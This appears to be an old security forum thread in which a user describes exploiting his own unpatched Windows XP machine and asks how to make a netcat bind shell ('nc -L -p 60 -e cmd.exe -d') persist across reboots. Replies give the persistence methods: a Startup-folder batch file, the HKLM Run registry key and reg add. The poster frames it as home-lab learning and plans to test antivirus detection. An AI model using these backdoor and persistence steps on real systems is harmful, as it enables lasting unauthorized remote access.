netcat on boot?

[Old Man]

Is there a way to get netcat to load and listen on a port at startuo in winxp pro?
I've been googling but can't come up with an answer so I thought I'd ask here.
I can manualy start it, but I want it to start everytime I boot with a set of commands to listen on a specific port.
Could I add an entry to the autoexec.bat file? or autoexec.nt?
any ideas would be great.

[zencoder]

First hit on a Google for "netcat help"
Netcat
'Netcat' is a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. ... Help List, <giovanni@giacobbi.net> ...
directory.fsf.org/netcat.html

First hit on a Google for "winxp startup folder"
Advanced Windows XP User Features > Modifying the Startup Folder
Think of the Startup folder as a means for automatically configuring ... Like everything else in Windows XP, you'll find the Startup folder in Explorer. ...
http://www.informit.com/articles/art...29744&seqNum=9

Application of the ideas presented in these links is left to the student for practical excercise.

[Old Man]

yes netcat can be loaded.......but how can I load it on boot with a nc -L-p 60 -e cmd.exe -d command?
batch file?
Ok...here's the full story......I'll probably be neged or banned.
I was bored and wondering just how someone could get acces to an xp box, so I dug an old computer up from the basement and did a fresh install of xp pro with no updates, no firewall and no virus protector and hooked it up to my lan.
I downloaded a well known exploit program, exploited the box and got a command prompt.
Now I thought..........what can you do with a command prompt?...lots of stuff...
I fired up a tftp server and remotely uploaded netcat and set it to listen to port 60 with a cmd.exe execute.
now..........on reboot netcat no longer listens....so no backdoor....
so I was wondering how netcat can be set to start on boot to listen on the port I want it to.
I want to set it do do this remotly, this has to be done from a command line, or from editing a file that I can upload the the target box.

This is just a learning thing on my own lan with my own box because I'm bored.
I'll write a full tut if anyone wants, but I think Irongeek does a much better job with the videos.

ban me neg me ........whatever

[SirDice]

Drop all the commands you need into a batch file..
Have it start either via the startup folder by moving the batchfile into that folder or you can start it using the hkey_local_machine\software\microsoft\windows\currentversion\run registrykey..

[IKnowNot]

Not a lot to say here, your question seems to have been answered.

ban me neg me ........whatever

Close, no cigar. Try again

I'll write a full tut if anyone wants ...

I don't know if this would warrant a tut, but maybe if you included what you found as far as hiding it, what works, what doesn't, and then how to discover it on the system, then you may have something.
( examples might be, maybe it was stealthy for a fresh original XP install, but did not work on a box with SP2 and the built in firewall enabled by default, or maybe an add-on firewall, what anti-virus software detected it, maybe even if something like spy-bot detected it. )

Just a suggestion.

But as for the command to run????

Wouldn't it be more like:
nc -l -p60 -d -e cmd.exe -L ???

[rcgreen]

You should be able to put the literal command string into
a registry key, but I'm not an expert. All the other
trojans do it that way to keep novice users from knowing
about it.

[Tedob1]

IKnowNot "nc -l" would defeat the purpose of having it start up at boot for even a port scan would close it until the next boot. it needs to be "nc -L " for listen then listen again.

hey old man! you can make the registry entry from a cmd shell using reg.exe. see "reg add /?" for the correct usage. and a bat file can be made using ECHO e.g. "echo [command] >nc.bat", if you need to enter more than one command use ">>" for append otherwise all you'll have is the last entry. sorry if you know this already, just trying to be helpfull!

[Old Man]

Batch file in the startup folder did the trick.
Not stealthy at all, but that wasn't the point anyway.
Thanks for the help. Now I'm going to start installing the windows updates to see at what point, if any, the backdoor get's closed. I'm also going to try avg, trend micro, avast, spybot, spyware doctor, zonealarm, and mabey a few others to see what programs detect nc and what ones don't.

Thanks again for the help.

[Tedob1]

NetCat is neither a trojan or a virus. these AV's shouldn't detect it. it has too many practical uses.

[nihil]

I think Tedob~ is probably right but I would certainly add A-Squared to your list.

http://www.emsisoft.com/en/software/free/